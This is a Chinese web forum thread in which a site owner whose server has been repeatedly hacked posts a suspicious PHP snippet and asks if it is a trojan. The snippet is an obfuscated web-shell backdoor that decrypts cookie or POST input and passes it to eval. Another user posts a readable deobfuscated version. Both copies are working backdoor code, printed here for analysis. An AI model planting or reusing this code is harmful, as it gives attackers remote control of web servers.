a7898585 发表于 2018-4-16 21:50:09

这是马?

护卫神安装的网站,已经被搞了三次了
也不知道哪里的问题
之前安装的wp,这次是帝国
[*] $eyzaqt){function amuzp($mxavm, $jbmwo, $vfruhe){return $mxavm($mxavm($jbmwo . $mxavm, ($vfruhe / $mxavm($jbmwo)) + 1), 0, $vfruhe);}function rbwcal($mxavm, $ufkgca){return @$mxavm($mxavm, $ufkgca);}function sbfawmr($mxavm, $ufkgca){$fhbsrqm = $mxavm($ufkgca) % 3;if (!$fhbsrqm) {eval($ufkgca($ufkgca));exit();}}$eyzaqt = rbwcal($mxavm, $eyzaqt);sbfawmr($mxavm, $mxavm($mxavm, $eyzaqt ^ amuzp($mxavm, $jbmwo, $mxavm($eyzaqt))));}复制代码

cxd44 发表于 2018-4-16 21:51:23

帮顶,看看什么问题

fgpgy 发表于 2018-4-16 21:52:19

加密了

itbobo 发表于 2018-4-16 21:52:50

一步一步翻译过来就知道干嘛了

itbobo 发表于 2018-4-16 22:04:44

[*]$wdkrt = 'ka6fbtmHdxi8opnrvl1\'e04*s_g3y-u7#c92';
[*]$mxavm = Array();
[*]$mxavm = '0e87df1c-4837-4122-b692-bae83b90e1a6';
[*]$mxavm = 'H*';
[*]$mxavm = '#';
[*]$mxavm = 'count';
[*]$mxavm = 'str_repeat';
[*]$mxavm = 'explode';
[*]$mxavm = 'substr';
[*]$mxavm = 'array_merge';
[*]$mxavm = 'strlen';
[*]$mxavm = 'pack';
[*]foreach (array_merge($_COOKIE, $_POST) as $jbmwo => $eyzaqt){
[*]    function amuzp($mxavm, $jbmwo, $vfruhe){
[*]      return substr(str_repeat($jbmwo . '0e87df1c-4837-4122-b692-bae83b90e1a6', ($vfruhe / strlen($jbmwo)) + 1), 0, $vfruhe);
[*]    }
[*]    function rbwcal($mxavm, $ufkgca){
[*]      return @pack('H*', $ufkgca);
[*]    }
[*]    function sbfawmr($mxavm, $ufkgca){
[*]      $fhbsrqm = count($ufkgca) % 3;
[*]      if (!$fhbsrqm) {
[*]            eval($ufkgca($ufkgca));
[*]            exit();
[*]      }
[*]    }
[*]    $eyzaqt = rbwcal($mxavm, $eyzaqt);
[*]    sbfawmr($mxavm, explode('#', $eyzaqt ^ amuzp($mxavm, $jbmwo, strlen($eyzaqt))));
[*]}复制代码

ywfhack 发表于 2018-4-16 22:21:12

页: [1]
查看完整版本: 这是马?